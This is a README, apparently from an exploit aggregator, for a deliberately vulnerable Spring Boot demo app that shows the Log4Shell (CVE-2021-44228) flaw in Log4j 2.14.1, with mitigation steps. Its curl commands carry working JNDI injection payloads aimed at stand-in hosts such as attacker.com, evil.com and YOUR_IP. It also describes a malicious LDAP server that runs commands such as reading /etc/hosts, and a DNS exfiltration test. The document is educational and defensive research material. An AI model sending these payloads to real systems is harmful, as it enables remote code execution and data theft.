Share
## https://sploitus.com/exploit?id=427C0948-563D-5EB2-A575-FFD85C778305
# Log4j2-BugMaker

## CVE-2021-44228 Log4Shell Vulnerability Demonstration Project

This is a demonstration project designed for learning and researching Log4j2โ€™s remote code execution vulnerabilities (Log4Shell). ## โš ๏ธ Safety Warning

**This project is intended solely for safety research and educational purposes. Do not use it in a production environment!**

This project uses Log4j 2.14.1, which has serious security vulnerabilities. ## ๐Ÿ“‹ Environment Configuration

- **Spring Boot**: 2.6.1
- **Log4j2**: 2.14.1 (vulnerable version)
- **Java**: 8 (JDK 1.8)

## ๐Ÿš€ Quick Start

### 1. Compile the project

```bash
./mvnw clean package
```

### 2. Run the application

```bash
./mvnw spring-boot:run
```

Or:

```bash
java -jar target/log4j2-bugmaker-0.0.1-SNAPSHOT.jar
```

### 3. Access the application

Open a browser and visit: http://localhost:8080

## ๐ŸŽฏ Vulnerability Endpoints

### 1. User-Agent Header Injection

```bash
curl -H "User-Agent: \${jndi:ldap://attacker.com/a}" http://localhost:8080/api/log
```

### 2. Query Parameter Injection

```bash
curl "http://localhost:8080/api/search?query=\${jndi:ldap://attacker.com/a)"
```

### 3. Health Check (No Vulnerabilities)

```bash
curl http://localhost:8080/api/health
```

## ๐Ÿ’ก Vulnerability Mechanism

Log4Shell (CVE-2021-44228) is a serious vulnerability in Apache Log4j2. When an application records user input containing special format strings, Log4j2 parses JNDI lookup expressions, allowing attackers to execute remote code. ### Attack Vector Examples

```
${jndi:ldap://evil.com/a}
${jndi:rmi://evil.com/a}
${jndi:dns://evil.com/a}
```

### Test Vectors (Safe)

```
${java:version}
${java:os}
${env:PATH}
```

## ๐Ÿ”ง Testing Steps

1. Start the application.
2. Send requests containing JNDI expressions.
3. Review console logs to observe Log4j2โ€™s parsing behavior.

## ๐Ÿ›ก๏ธ Fixing Solutions

### Solution 1: Upgrade Log4j2 Version

Upgrade Log4j2 to version 2.17.1 or higher:

```xml

    2.17.1

```

### Solution 2: Set JVM Parameters

```bash
-Dlog4j2.formatMsgNoLookups=true
```

### Solution 3: Remove the JndiLookup Class

```bash
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
```

## ๐Ÿš€ Remote Code Execution Demonstration

### Method 1: Using the provided tools (Recommended)

```bash
# 1. Run the automated script
./setup-exploit-server.sh

# 2. Select the JNDI-Injection-Exploit tool
# 3. Enter the command to execute (e.g., whoami or cat /etc/hosts)
# 4. Send the attack payload in another terminal
```

### Method 2: Using a Python LDAP Server

```bash
# Start the malicious LDAP server
python3 simple-ldap-server.py "whoami"

# Or execute other commands
python3 simple-ldap-server.py "cat /etc/hosts"

# Send the attack payload in another terminal
curl -H 'User-Agent: ${jndi:ldap://YOUR_IP:1389/Exploit}' http://localhost:8080/api/log
```

### Method 3: DNS Exfiltration (No Server Required)

```bash
# Run the DNS exfiltration test script
./test-dns-exfiltration.sh

# Follow instructions to access dnslog.cn and obtain a subdomain name
# Then check if DNS query requests are received
```

## ๐Ÿ“š References

- [Details of CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228)
- [Apache Log4j Security Bulletin](https://logging.apache.org/log4j/2.x/security.html)
- [CISA Warning](https://www.cisa.gov/news-events/cybersecurity-advisories/aa21-356a)
- [JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit)
- [JNDIExploit](https://github.com/feihong-cs/JNDIExploit)

## ๐Ÿ“ License

This project is open source under the [MIT License](LICENSE). **Note:** This project is intended solely for educational and security research purposes. Users must bear the risks associated with its use. ## โš ๏ธ Legal Statement

Unauthorized penetration testing of other systems is illegal! This project is used only for:
- Learning in your own testing environment
- Authorized security testing
- Security research and educational purposes

Please comply with local laws and use this knowledge responsibly.

[source-iocs-preserved url=http://localhost:8080/api/search?query=\${jndi:ldap://attacker.com/a}]